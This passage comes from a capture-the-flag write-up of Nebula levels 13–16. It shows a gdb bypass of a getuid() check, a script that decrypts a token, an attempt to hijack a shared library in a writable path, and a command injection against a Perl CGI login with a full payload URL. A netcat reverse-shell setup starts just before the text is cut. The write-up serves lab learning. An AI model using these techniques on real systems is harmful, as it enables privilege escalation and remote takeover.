<span class="mh">0x080485f1</span><span class="w"> </span><span class="o"><+</span><span class="mi">301</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">pop</span><span class="w"> </span><span class="n">edi</span><span class="w"></span>
<span class="mh">0x080485f2</span><span class="w"> </span><span class="o"><+</span><span class="mi">302</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">pop</span><span class="w"> </span><span class="n">ebp</span><span class="w"></span>
<span class="mh">0x080485f3</span><span class="w"> </span><span class="o"><+</span><span class="mi">303</span><span class="o">></span><span class="err">:</span><span class="w"> </span><span class="n">ret</span><span class="w"></span>
</code></pre></div>
<p>As you can see the assembly shows us that in the following snippet it is decided whether the call
to getuid() returns 1000 or not:</p>
<div class="highlight"><pre><span></span><code><span class="err">0</span><span class="nf">x080484f4</span><span class="w"> </span><span class="err"><+</span><span class="mi">48</span><span class="err">></span><span class="p">:</span><span class="w"> </span><span class="no">cmp</span><span class="w"> </span><span class="no">eax</span><span class="p">,</span><span class="mi">0x3e8</span><span class="w"></span>
<span class="err">0</span><span class="nf">x080484f9</span><span class="w"> </span><span class="err"><+</span><span class="mi">53</span><span class="err">></span><span class="p">:</span><span class="w"> </span><span class="no">je</span><span class="w"> </span><span class="mh">0x8048531</span> <span class="p"><</span><span class="no">main</span><span class="p">+</span><span class="mi">109</span><span class="p">></span><span class="w"></span>
</code></pre></div>
<p>If the jump is taken, we continue at <code>main+109</code>. There, some decoding happens. In fact, the
lines:</p>
<div class="highlight"><pre><span></span><code><span class="err">0</span><span class="nf">x08048547</span><span class="w"> </span><span class="err"><+</span><span class="mi">131</span><span class="err">></span><span class="p">:</span><span class="w"> </span><span class="no">mov</span><span class="w"> </span><span class="no">edx</span><span class="p">,</span><span class="mi">0x804874c</span><span class="w"></span>
<span class="err">0</span><span class="nf">x0804854c</span><span class="w"> </span><span class="err"><+</span><span class="mi">136</span><span class="err">></span><span class="p">:</span><span class="w"> </span><span class="no">lea</span><span class="w"> </span><span class="no">eax</span><span class="p">,[</span><span class="no">esp</span><span class="err">+</span><span class="mi">0x2c</span><span class="p">]</span><span class="w"></span>
</code></pre></div>
<p>grab the string <code>8mjomjh8wml;bwnh8jwbbnnwi;>;88?o;9ob</code> from the <code>.data</code> section and prepare some
buffer on the stack for further processing. I don't exactly what decoding happens in the following
<code>mov</code> statements, but it is the reason why the token doesn't work right away as login password for the flag13 account.
It is first transformed.
Anyways, we just set the eax flag to contain 1000 instead of our <code>getuid()</code> return value to circumwent the check
and let the program decode the token for us:</p>
<div class="highlight"><pre><span></span><code>level13@nebula:/home/flag13$ gdb flag13
GNU gdb (Ubuntu/Linaro 7.3-0ubuntu2) 7.3-2011.08
<...snipp...>
(gdb) break *(main+48)
Breakpoint 1 at 0x80484f4
(gdb) r
Starting program: /home/flag13/flag13
Breakpoint 1, 0x080484f4 in main ()
(gdb) i r
eax 0x3f6 1014
ecx 0xbfa37f54 -1079804076
edx 0xbfa37ee4 -1079804188
ebx 0x287ff4 2654196
esp 0xbfa37d80 0xbfa37d80
ebp 0xbfa37eb8 0xbfa37eb8
esi 0x0 0
edi 0x0 0
eip 0x80484f4 0x80484f4 <main+48>
eflags 0x282 [ SF IF ]
cs 0x73 115
ss 0x7b 123
ds 0x7b 123
es 0x7b 123
fs 0x0 0
gs 0x33 51
(gdb) set $eax = 1000
(gdb) continue
Continuing.
your token is b705702b-76a8-42b0-8844-3adabbe5ac58
[Inferior 1 (process 2096) exited with code 063]
(gdb) quit
level13@nebula:/home/flag13$ su flag13
Password:
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$
</code></pre></div>
<h2>Level 14 - Decryping simple enryption</h2>
<p>This level is also quite easy. The setuid binary <code>/home/flag14/flag14</code> encrypts input. When we call the
application <code>./flag14 -e</code> and always enter the same character and press escape, we see that the app outputs
always the next character.</p>
<p>Then we have a file with a encrypted token for the account <code>flag14</code>. </p>
<div class="highlight"><pre><span></span><code>level14@nebula:/home/flag14$ xxd token
<span class="m">0000000</span>: <span class="m">3835</span> 373a <span class="m">6736</span> 373f <span class="m">3541</span> <span class="m">4242</span> 6f3a <span class="m">4274</span> <span class="m">857</span>:g67?5ABBo:Bt
<span class="m">0000010</span>: <span class="m">4441</span> 3f74 <span class="m">4976</span> 4c44 4b4c 7b4d <span class="m">5150</span> <span class="m">5352</span> DA?tIvLDKL<span class="o">{</span>MQPSR
<span class="m">0000020</span>: <span class="m">5157</span> 572e 0a QWW..
</code></pre></div>
<p>To decrypt it, I created a simple python script the reverses the encryption logic:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python</span>
<span class="k">def</span> <span class="nf">decrypt</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
<span class="sd">"""</span>
<span class="sd"> Each input character is encoded like this:</span>
<span class="sd"> enc(char_i) = chr(ord(char) + i)</span>
<span class="sd"> This means that the first input character is mapped to itself and the</span>
<span class="sd"> nth character is mapped to enc(char_n) = chr(ord(char) + n)</span>
<span class="sd"> """</span>
<span class="n">out</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span> <span class="n">c</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
<span class="n">out</span> <span class="o">+=</span> <span class="nb">chr</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">c</span><span class="p">)</span> <span class="o">-</span> <span class="n">i</span><span class="p">)</span>
<span class="k">return</span> <span class="n">out</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">():</span>
<span class="nb">print</span> <span class="n">decrypt</span><span class="p">(</span><span class="s1">'857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW</span><span class="se">\x2e</span><span class="s1">'</span><span class="p">)</span>
<span class="n">main</span><span class="p">()</span>
</code></pre></div>
<p>Executing this yields the token <code>8457c118-887c-4e40-a5a6-33a25353165</code> which is the password for
the flag14 account.</p>
<h2>Level 15 - Injecting own shared libraries</h2>
<p>When we call <code>/home/flag15/flag15</code> it outputs </p>
<blockquote>
<p>strace it!</p>
</blockquote>
<p>So I straced it:</p>
<div class="highlight"><pre><span></span><code>level15@nebula:/home/flag15$ strace ./flag15
execve<span class="o">(</span><span class="s2">"./flag15"</span>, <span class="o">[</span><span class="s2">"./flag15"</span><span class="o">]</span>, <span class="o">[</span>/* <span class="m">28</span> vars */<span class="o">])</span> <span class="o">=</span> <span class="m">0</span>
brk<span class="o">(</span><span class="m">0</span><span class="o">)</span> <span class="o">=</span> 0x8750000
access<span class="o">(</span><span class="s2">"/etc/ld.so.nohwcap"</span>, F_OK<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
mmap2<span class="o">(</span>NULL, <span class="m">8192</span>, PROT_READ<span class="p">|</span>PROT_WRITE, MAP_PRIVATE<span class="p">|</span>MAP_ANONYMOUS, -1, <span class="m">0</span><span class="o">)</span> <span class="o">=</span> 0xb7879000
access<span class="o">(</span><span class="s2">"/etc/ld.so.preload"</span>, R_OK<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686/sse2/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686/sse2/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686/sse2/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686/sse2"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/i686"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/sse2/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/sse2/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/sse2/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/sse2"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/tls"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686/sse2/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686/sse2/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686/sse2/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686/sse2"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/i686"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/sse2/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/sse2/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/sse2/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/sse2"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/cmov/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15/cmov"</span>, 0xbfe04ec4<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/var/tmp/flag15/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
stat64<span class="o">(</span><span class="s2">"/var/tmp/flag15"</span>, <span class="o">{</span><span class="nv">st_mode</span><span class="o">=</span>S_IFDIR<span class="p">|</span><span class="m">0775</span>, <span class="nv">st_size</span><span class="o">=</span><span class="m">60</span>, ...<span class="o">})</span> <span class="o">=</span> <span class="m">0</span>
open<span class="o">(</span><span class="s2">"/etc/ld.so.cache"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> <span class="m">3</span>
fstat64<span class="o">(</span><span class="m">3</span>, <span class="o">{</span><span class="nv">st_mode</span><span class="o">=</span>S_IFREG<span class="p">|</span><span class="m">0644</span>, <span class="nv">st_size</span><span class="o">=</span><span class="m">33815</span>, ...<span class="o">})</span> <span class="o">=</span> <span class="m">0</span>
mmap2<span class="o">(</span>NULL, <span class="m">33815</span>, PROT_READ, MAP_PRIVATE, <span class="m">3</span>, <span class="m">0</span><span class="o">)</span> <span class="o">=</span> 0xb7870000
close<span class="o">(</span><span class="m">3</span><span class="o">)</span> <span class="o">=</span> <span class="m">0</span>
access<span class="o">(</span><span class="s2">"/etc/ld.so.nohwcap"</span>, F_OK<span class="o">)</span> <span class="o">=</span> -1 ENOENT <span class="o">(</span>No such file or directory<span class="o">)</span>
open<span class="o">(</span><span class="s2">"/lib/i386-linux-gnu/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> <span class="m">3</span>
read<span class="o">(</span><span class="m">3</span>, <span class="s2">"\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\222\1\0004\0\0\0"</span>..., <span class="m">512</span><span class="o">)</span> <span class="o">=</span> <span class="m">512</span>
fstat64<span class="o">(</span><span class="m">3</span>, <span class="o">{</span><span class="nv">st_mode</span><span class="o">=</span>S_IFREG<span class="p">|</span><span class="m">0755</span>, <span class="nv">st_size</span><span class="o">=</span><span class="m">1544392</span>, ...<span class="o">})</span> <span class="o">=</span> <span class="m">0</span>
mmap2<span class="o">(</span>NULL, <span class="m">1554968</span>, PROT_READ<span class="p">|</span>PROT_EXEC, MAP_PRIVATE<span class="p">|</span>MAP_DENYWRITE, <span class="m">3</span>, <span class="m">0</span><span class="o">)</span> <span class="o">=</span> 0x110000
mmap2<span class="o">(</span>0x286000, <span class="m">12288</span>, PROT_READ<span class="p">|</span>PROT_WRITE, MAP_PRIVATE<span class="p">|</span>MAP_FIXED<span class="p">|</span>MAP_DENYWRITE, <span class="m">3</span>, 0x176<span class="o">)</span> <span class="o">=</span> 0x286000
mmap2<span class="o">(</span>0x289000, <span class="m">10776</span>, PROT_READ<span class="p">|</span>PROT_WRITE, MAP_PRIVATE<span class="p">|</span>MAP_FIXED<span class="p">|</span>MAP_ANONYMOUS, -1, <span class="m">0</span><span class="o">)</span> <span class="o">=</span> 0x289000
close<span class="o">(</span><span class="m">3</span><span class="o">)</span> <span class="o">=</span> <span class="m">0</span>
mmap2<span class="o">(</span>NULL, <span class="m">4096</span>, PROT_READ<span class="p">|</span>PROT_WRITE, MAP_PRIVATE<span class="p">|</span>MAP_ANONYMOUS, -1, <span class="m">0</span><span class="o">)</span> <span class="o">=</span> 0xb786f000
set_thread_area<span class="o">({</span>entry_number:-1 -> <span class="m">6</span>, base_addr:0xb786f8d0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1<span class="o">})</span> <span class="o">=</span> <span class="m">0</span>
mprotect<span class="o">(</span>0x286000, <span class="m">8192</span>, PROT_READ<span class="o">)</span> <span class="o">=</span> <span class="m">0</span>
mprotect<span class="o">(</span>0x8049000, <span class="m">4096</span>, PROT_READ<span class="o">)</span> <span class="o">=</span> <span class="m">0</span>
mprotect<span class="o">(</span>0x8e6000, <span class="m">4096</span>, PROT_READ<span class="o">)</span> <span class="o">=</span> <span class="m">0</span>
munmap<span class="o">(</span>0xb7870000, <span class="m">33815</span><span class="o">)</span> <span class="o">=</span> <span class="m">0</span>
fstat64<span class="o">(</span><span class="m">1</span>, <span class="o">{</span><span class="nv">st_mode</span><span class="o">=</span>S_IFCHR<span class="p">|</span><span class="m">0620</span>, <span class="nv">st_rdev</span><span class="o">=</span>makedev<span class="o">(</span><span class="m">136</span>, <span class="m">0</span><span class="o">)</span>, ...<span class="o">})</span> <span class="o">=</span> <span class="m">0</span>
mmap2<span class="o">(</span>NULL, <span class="m">4096</span>, PROT_READ<span class="p">|</span>PROT_WRITE, MAP_PRIVATE<span class="p">|</span>MAP_ANONYMOUS, -1, <span class="m">0</span><span class="o">)</span> <span class="o">=</span> 0xb7878000
write<span class="o">(</span><span class="m">1</span>, <span class="s2">"strace it!\n"</span>, 11strace it!
<span class="o">)</span> <span class="o">=</span> <span class="m">11</span>
exit_group<span class="o">(</span><span class="m">11</span><span class="o">)</span> <span class="o">=</span> ?
</code></pre></div>
<p>As you can see the dynamic linker tries to load the <code>libc</code> from the directory <code>/var/tmp/flag15/</code>. This is a very unusual
path and a quick check reveals that this directory is owned by user <code>level15</code>, which means we can write to it.</p>
<div class="highlight"><pre><span></span><code>level15@nebula:/home/flag15$ ls -dl /var/tmp/flag15/
drwxrwxr-x <span class="m">1</span> level15 level15 <span class="m">60</span> Oct <span class="m">4</span> <span class="m">13</span>:59 /var/tmp/flag15/
</code></pre></div>
<p>After having tried some paths in <code>/var/tmp/flag15/</code>, the dynamic linker finally finds it libc in
<code>/lib/i386-linux-gnu/libc.so.6</code> and loads it into memory:</p>
<div class="highlight"><pre><span></span><code>open<span class="o">(</span><span class="s2">"/lib/i386-linux-gnu/libc.so.6"</span>, O_RDONLY<span class="o">)</span> <span class="o">=</span> <span class="m">3</span>
read<span class="o">(</span><span class="m">3</span>, <span class="s2">"\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\222\1\0004\0\0\0"</span>..., <span class="m">512</span><span class="o">)</span> <span class="o">=</span> <span class="m">512</span>
</code></pre></div>
<p>The basic idea is to create our own libc and patch the <code>puts()</code> function that is used.
As we can see in the strace output, the string <code>strace it!</code> is written with the <code>write()</code> function
call at the end.</p>
<p>What if we could patch the <code>write()</code> system call?</p>
<p>Let's try it. I created the following C program:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdlib.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span><span class="cp"></span>
<span class="cp">#define _GNU_SOURCE</span>
<span class="kt">int</span><span class="w"> </span><span class="nf">write</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">fd</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="o">*</span><span class="w"> </span><span class="n">buf</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="w"> </span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="s">"strace it!</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Inside hook!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">system</span><span class="p">(</span><span class="s">"/bin/getflag >> /tmp/flagged"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>and issued the following commands:</p>
<div class="highlight"><pre><span></span><code>level15@nebula:/home/flag15$ cat /tmp/write.c
<span class="c1">#include <stdlib.h></span>
<span class="c1">#include <stdio.h></span>
<span class="c1">#define _GNU_SOURCE</span>
int write<span class="o">(</span>int fd, const char* buf<span class="o">)</span> <span class="o">{</span>
<span class="k">if</span> <span class="o">(</span>strcmp<span class="o">(</span>buf, <span class="s2">"strace it!\n"</span><span class="o">)</span> <span class="o">==</span> <span class="m">0</span><span class="o">)</span> <span class="o">{</span>
printf<span class="o">(</span><span class="s2">"Inside hook!\n"</span><span class="o">)</span><span class="p">;</span>
system<span class="o">(</span><span class="s2">"/bin/getflag >> /tmp/flagged"</span><span class="o">)</span><span class="p">;</span>
<span class="o">}</span>
<span class="k">return</span> <span class="m">0</span><span class="p">;</span>
<span class="o">}</span>
level15@nebula:/home/flag15$ gcc -Wall -fPIC -shared -o /var/tmp/flag15/libc.so.6 /tmp/write.c
/tmp/write.c: In <span class="k">function</span> write:
/tmp/write.c:7:2: warning: implicit declaration of <span class="k">function</span> strcmp <span class="o">[</span>-Wimplicit-function-declaration<span class="o">]</span>
level15@nebula:/home/flag15$ ./flag15
./flag15: /var/tmp/flag15/libc.so.6: no version information available <span class="o">(</span>required by ./flag15<span class="o">)</span>
./flag15: /var/tmp/flag15/libc.so.6: no version information available <span class="o">(</span>required by /var/tmp/flag15/libc.so.6<span class="o">)</span>
./flag15: /var/tmp/flag15/libc.so.6: no version information available <span class="o">(</span>required by /var/tmp/flag15/libc.so.6<span class="o">)</span>
./flag15: relocation error: /var/tmp/flag15/libc.so.6: symbol __cxa_finalize, version GLIBC_2.1.3 not defined <span class="k">in</span> file libc.so.6 with link <span class="nb">time</span> reference
</code></pre></div>
<p>Seems like it isn't so easy to create a own <code>libc</code>. But this is definitely the correct direction to investigate further.</p>
<h2>Level 16 - exploiting with uppercase only charset</h2>
<p>In this level we need to exploit a cgi web application that is written in Perl.</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/env perl</span>
<span class="k">use</span> <span class="nn">CGI</span> <span class="sx">qw{param}</span><span class="p">;</span>
<span class="k">print</span> <span class="s">"Content-type: text/html\n\n"</span><span class="p">;</span>
<span class="k">sub</span> <span class="nf">login</span> <span class="p">{</span>
<span class="nv">$username</span> <span class="o">=</span> <span class="nv">$_</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span>
<span class="nv">$password</span> <span class="o">=</span> <span class="nv">$_</span><span class="p">[</span><span class="mi">1</span><span class="p">];</span>
<span class="nv">$username</span> <span class="o">=~</span> <span class="nb">tr</span><span class="sr">/a-z/</span><span class="n">A</span><span class="o">-</span><span class="n">Z</span><span class="o">/</span><span class="p">;</span> <span class="c1"># conver to uppercase</span>
<span class="nv">$username</span> <span class="o">=~</span> <span class="sr">s/\s.*//</span><span class="p">;</span> <span class="c1"># strip everything after a space</span>
<span class="nv">@output</span> <span class="o">=</span> <span class="sb">`egrep "^$username" /home/flag16/userdb.txt 2>&1`</span><span class="p">;</span>
<span class="k">foreach</span> <span class="nv">$line</span> <span class="p">(</span><span class="nv">@output</span><span class="p">)</span> <span class="p">{</span>
<span class="p">(</span><span class="nv">$usr</span><span class="p">,</span> <span class="nv">$pw</span><span class="p">)</span> <span class="o">=</span> <span class="nb">split</span><span class="p">(</span><span class="sr">/:/</span><span class="p">,</span> <span class="nv">$line</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$pw</span> <span class="o">=~</span> <span class="nv">$password</span><span class="p">)</span> <span class="p">{</span>
<span class="k">return</span> <span class="mi">1</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">sub</span> <span class="nf">htmlz</span> <span class="p">{</span>
<span class="k">print</span><span class="p">(</span><span class="s">"<html><head><title>Login resuls</title></head><body>"</span><span class="p">);</span>
<span class="k">if</span><span class="p">(</span><span class="nv">$_</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Your login was accepted<br/>"</span><span class="p">);</span>
<span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Your login failed<br/>"</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">print</span><span class="p">(</span><span class="s">"Would you like a cookie?<br/><br/></body></html>\n"</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">htmlz</span><span class="p">(</span><span class="n">login</span><span class="p">(</span><span class="n">param</span><span class="p">(</span><span class="s">"username"</span><span class="p">),</span> <span class="n">param</span><span class="p">(</span><span class="s">"password"</span><span class="p">)));</span>
</code></pre></div>
<p>The web app will execute a command <code>egrep "^$username" /home/flag16/userdb.txt 2>&1</code> where username
can be passed as a GET parameter. But before it is substituted in the above command, the username
variable is transformed to uppercase and all spaces (and chars which follow them) are removed.</p>
<p>So our payload will be uppercase and without spaces. This means we cannot create a shell script in
<code>/tmp</code> to run a arbitrary script, because paths are of course case sensitive.</p>
<p>And we cannot alter environment variables in the <code>/home/flag16</code> directory, nor can we write in the document
root (also flag16 home dir). So how can we exploit this at all?</p>
<p>After some minutes of pure confusion, I tried to craft paths with bash wildcards. So I tried to execute a
program in temp without using lower space chars. </p>
<p>First I created a simple test script:</p>
<div class="highlight"><pre><span></span><code>level16@nebula:~$ cat /tmp/SLEEPY.SH
<span class="c1">#!/bin/bash</span>
sleep <span class="m">5</span>
</code></pre></div>
<p>Then I created a short Python program to request the cgi script:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python</span>
<span class="kn">import</span> <span class="nn">urllib2</span>
<span class="kn">from</span> <span class="nn">urllib</span> <span class="kn">import</span> <span class="n">quote</span>
<span class="n">host</span> <span class="o">=</span> <span class="s1">'192.168.56.101:1616'</span>
<span class="n">uri</span> <span class="o">=</span> <span class="s1">'http://</span><span class="si">{}</span><span class="s1">/index.cgi?username=</span><span class="si">{}</span><span class="s1">&password=</span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">quote</span><span class="p">(</span><span class="s1">'$(/*/SLEEPY.sh)'</span><span class="p">,</span> <span class="n">safe</span><span class="o">=</span><span class="s1">''</span><span class="p">),</span> <span class="s1">''</span><span class="p">)</span>
<span class="n">request</span> <span class="o">=</span> <span class="n">urllib2</span><span class="o">.</span><span class="n">urlopen</span><span class="p">(</span><span class="n">uri</span><span class="p">)</span>
<span class="c1"># should take at least 5 seconds if the code is executed</span>
<span class="nb">print</span> <span class="n">request</span><span class="o">.</span><span class="n">read</span><span class="p">()</span>
</code></pre></div>
<p>It worked! The payload <code>/*/OURCODE.SH</code> will execute the program in the <code>/tmp/</code> directory. Now I created a simple
POC script:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># create POC script </span>
<span class="nb">echo</span> -e <span class="s1">'#!/bin/bash\ngetflag > /tmp/gotflag'</span> > /tmp/FLAG.SH
chmod +x /tmp/FLAG.SH
</code></pre></div>
<p>And requested the url with the payload:</p>
<blockquote>
<p>http://192.168.56.101:1616/index.cgi?username=%24%28%2F%2A%2FFLAG.SH%29&password=</p>
</blockquote>
<p>It worked!</p>
<div class="highlight"><pre><span></span><code>level16@nebula:~$ cat /tmp/gotflag
You have successfully executed getflag on a target account
</code></pre></div>
<p>To get a shell, start netcat on your host computer and create a reverse shell in the
<code>/tmp</code> dir in the nebula host:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># on host pc</span>
<span class="n">nc</span> <span class="o">-</span><span class="n">l</span> <span class="mf">192.168.56.1</span> <span class="mi">8888</span>
<span class="c1"># on nebula host</span>
<span class="n">level16</span><span class="nd">@nebula</span><span class="p">:</span><span class="o">~</span><span class="err">$</span> <span class="n">cat</span> <span class="o">/</span><span class="n">tmp</span><span class="o">/</span><span class="n">BD</span><span class="o">.</span><span class="n">PY</span>
<span class="c1">#!/usr/bin/python</span>
